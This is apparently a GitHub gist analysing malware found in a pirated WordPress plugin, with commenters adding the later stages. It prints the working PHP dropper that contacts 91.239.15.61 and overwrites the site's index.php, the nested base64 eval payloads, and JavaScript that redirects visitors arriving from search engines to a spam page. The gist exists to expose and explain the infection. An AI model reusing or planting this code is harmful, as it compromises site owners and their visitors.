ocean90/o1.txt Secret

Last active December 29, 2015 22:49
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ocean90/2e5df9a9430a9a45f0f0 to your computer and use it in GitHub Desktop.
Save ocean90/2e5df9a9430a9a45f0f0 to your computer and use it in GitHub Desktop.
Analysis of the script shipped with a supposedly free "premium" WordPress plugin. Write-up: http://blog.wpde.org/?p=2322
<?php
// Found in aioseop_class.php inside the plugin package
// $X
/* ------------------------------------------------------------------
Author: Abdul Rahman Sherzad (www.afghancybersoft.com)
Email: info@afghancybersoft.com
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information
Systems Manager both in CRS and Herat University to support the educational needs.
--------------------------------------------------------------------- */
// First part of the injected code: an HTTP beacon to the attacker's host.
// The response ($result) is never used anywhere below, so this presumably only
// reports the infected site back to the operator — TODO confirm against
// info.php, which is not part of this gist.
$curl = curl_init('http://91.239.15.61/info.php');
curl_setopt($curl, CURLOPT_FAILONERROR, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// TLS verification is switched off although the URL is plain http://; it only
// matters if a redirect (followed because of FOLLOWLOCATION) lands on https://.
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
// Second part: the dropper. It downloads o1.txt (its contents are shown further
// below) and writes it over the site's front controller.
// file_get_contents() on a URL requires allow_url_fopen=On; hosts with it off
// would not be infected by this path.
$code_txt = 'http://91.239.15.61/o1.txt';
$path = getenv("DOCUMENT_ROOT").'';
// Only WordPress installs are targeted, recognised by the three standard
// directories under the document root.
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
// Unconditional overwrite of index.php. The return value is ignored (the if
// body is empty), so a failed write goes unnoticed. Worse, if the download
// fails file_get_contents() returns false and file_put_contents() then writes
// an empty file, truncating the site's index.php.
if(file_put_contents($index_path, $code)){
}
}else{
echo 'Not a wordpress Installation';
}
// Contents of http://91.239.15.61/o1.txt, the file written over the site's index.php above:
/**
* The quotation marks around the base64 arguments are missing. Apart from that
* it is eval(base64_decode(...)) nested several layers deep. The missing quotes
* do not stop it from running before PHP 8: an undefined constant evaluates to
* its own name as a string (with only a notice or warning), so the decoder still
* gets the intended input as long as the blob is a valid identifier (no +, / or =).
*
* string(1279) "eval(base64_decode(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.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));"
* string(942) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRXdTME5YYkcxTFIxb3hZbTFPTUdGWE9YVllNbFkwWVZoT01HTjVaMjVaTTFaNVlrWTVjR0p0YkRCS2VXdHdSRkZ2U21WM01FdERVV3RyWkZoS2MwbEVNR2RKYldnd1pFaEJOa3g1T0RWTlV6UjVUWHByZFUxVVZYVk9ha1YyWVcxR01sbFRPVzVpTWpsdVlrZFZkV05IYUhkSmFuTm5SRkZ2U2tOVFVtcGhRMEU1U1VkT01XTnRlR1poVnpWd1pFTm5jRTk1UVdkRVVXOUtRMU5TTUdGWE1XeGlNMVl3U1VRd1owNVVjMmRKUVRCTFExRnNhbVJZU25OWU0wNXNaRWM1ZDJSRFoydFpNbWR6VVRGV1UxUkZPVkZXUmpsV1ZXdDNjMHBJVm5saVEyczNTVUV3UzBOUmJHcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldUSm5jMUV4VmxOVVJUbFJWa1k1VTFKV1VsWlZhelZWVld0R1QxVXdXa1pWYVhkNFMxUnpaMFJSYjBwRFYwNHhZMjE0Wm1NeVZqQmlNMEl3UzBOU2FtRkRlRVJXVmtwTlZERkNWVmd3VGxCVWF6VkdVVEZTVlZOVk1VWlVNVlpWVEVOU01HRlhNV3hpTTFZd1MxUnpaMFJSYjBwRFUxSnJXVmhTYUVsRU1HZFpNMVo1WWtZNWJHVkhWbXBMUTFKcVlVTnJOMGxEUVU1RFoydEtXVE5XZVdKR09XcGlSemw2V2xObmExa3laM0JQZVVGT1EyZHJTbHBYVG05aWVVRnBTa2RTYUdSSFJXbFBkekJMUTFnd1RrTnBPSFpR.ZWpST1EyY3BLVHMpKTs));"
* string(689) "eval(base64_decode(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));"
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));"
* Fully decoded, the innermost layer is the following:
*/
//<?php
// Final payload. According to the decoding above it runs from inside the
// replaced index.php on every page load, before WordPress itself is loaded:
// fetch the attacker's google.php and echo it verbatim.
if(function_exists('curl_init'))
{
$url = "http://91.239.15.61/java/google.php";
$ch = curl_init();
// 5 s connect timeout, but no CURLOPT_TIMEOUT: a host that accepts the
// connection and then stalls would hang every page load of the site.
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
// Whatever the remote host returns is injected into the page unescaped, so the
// operator can change the payload server-side without touching the site again.
// google.php (see the first comment on this gist) is a complete HTML document,
// so the served page ends up with two <html> documents — a tell-tale sign in
// the page source.
echo "$data";
}
//?>
<?php
// Start of o1.txt, i.e. the replacement index.php. Output buffering is switched
// on first, presumably so that the HTML echoed by the payload below does not
// make WordPress's later header() calls fail with "headers already sent" —
// TODO confirm.
ob_start(); ?>
<?
// The eval'd payload (its base64 argument is redacted in this copy) unwraps,
// per the analysis above, to the curl fetch of google.php. Note the short open
// tag: on hosts with short_open_tag=Off this line is not executed at all but
// printed into the page as text.
eval(base64_decode(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.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)); ?>
<?php
// From here on o1.txt is the stock WordPress index.php, appended unchanged —
// presumably so that the overwritten front controller keeps serving the site
// normally and the infection is not obvious to visitors or the owner.
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
@catlauraherzog

This is what google.php (the file fetched and echoed by the payload above) contains:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
// Loader half of the redirect: if the gating cookie is not set yet, inject
// google.js (reproduced in the next comment) from the attacker's host.
// The cookie is only written afterwards, by the onload handler below.
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
     var head=document.getElementsByTagName('head')[0]
      var script=document.createElement('script')
       script.setAttribute('type', 'text/javascript')
       // Remote script: its contents can be changed server-side at any time.
       script.setAttribute('src', "http://91.239.15.61/google.js")
       head.appendChild(script)
}
}

// Writes a cookie on path "/" meant to persist for `days` days.
// The expiry arithmetic is wrong: 3600*3600*3600*1000 ms is not one day, and
// with the 999 passed from the onload handler the result exceeds the maximum
// Date value, so toGMTString() yields "Invalid Date". Browsers ignore an
// unparsable Expires attribute, which presumably makes doRedirect a session
// cookie rather than a long-lived one — TODO confirm in a browser.
function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
// 999 * 3600^3 * 1000 is about 4.7e16 ms; Date only represents up to 8.64e15 ms.
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

// Returns the value of cookie `name`, or null if it is not set.
// Plain prefix match on each "name=value" pair after trimming leading spaces.
function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

// Runs once the page has loaded: inject google.js unless gated by the cookie,
// then set the gating cookie. Because redirect() runs first, the injection
// happens on the first visit; later visits only re-set the cookie.
window.onload = function()
{
redirect();
createCookie('doRedirect','true','999');
}
//-->
</script>
</head>

<body>
</body>
</html>

@catlauraherzog

And this is google.js (the script injected by google.php above):

    // Referrer-gated redirect: only visitors who arrived from a search engine
    // are sent to g.php, so the site owner (direct or bookmarked visits) never
    // sees it. This is a substring test on the whole referrer URL, not a check
    // of its host.
    var from = document.referrer;
    var i;
    var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
    for (i = 0; i < se.length; ++i) {
        // indexOf() is -1 when absent, so "+ 1" is truthy only on a match.
        if (from.indexOf(se[i]) + 1) {
            // checkCookie() sets its cookie on the first call and returns
            // false, so the redirect fires once per cookie lifetime; the loop
            // is not broken, but any further match then sees the cookie.
            if (!checkCookie()) {
                window.location = "http://91.239.15.61/g.php";
            }
        }
    }

    // Returns the (unescaped) value of cookie c_name, or null if absent.
    // Looks for " c_name=" first and then "c_name=" anywhere, so a cookie whose
    // name merely ends with c_name could also match.
    function getCookie(c_name) {
        var c_value = document.cookie;
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1) {
            c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1) {
            c_value = null;
        }
        else {
            c_start = c_value.indexOf("=", c_start) + 1;
            var c_end = c_value.indexOf(";", c_start);
            if (c_end == -1) {
                c_end = c_value.length;
            }
            c_value = unescape(c_value.substring(c_start, c_end));
        }
        return c_value;
    }

    // Writes cookie c_name=value expiring in exdays days (a session cookie when
    // exdays is null). No path attribute is given, so the cookie's scope
    // defaults to the directory of the current page rather than the whole
    // site; the redirect can therefore fire again on other paths — worth
    // confirming in a browser.
    function setCookie(c_name, value, exdays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }

    // Gate for the redirect: true if referrerRedirectCookie is already set;
    // otherwise sets it (730 days) and returns false, so the caller redirects
    // exactly once per cookie lifetime and scope.
    function checkCookie() {
        var referrerRedirectCookie = getCookie("referrerRedirectCookie");
        if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
            return true;
        }
        else {
            setCookie("referrerRedirectCookie", "do not redirect", 730);
            return false;
        }
    }

Do not open http://91.239.15.61/g.php in a browser: it is the final redirect target and serves porn spam. Note that the redirect only fires for visitors arriving from a search engine and only once per cookie, so an owner browsing their own site directly would not notice it.
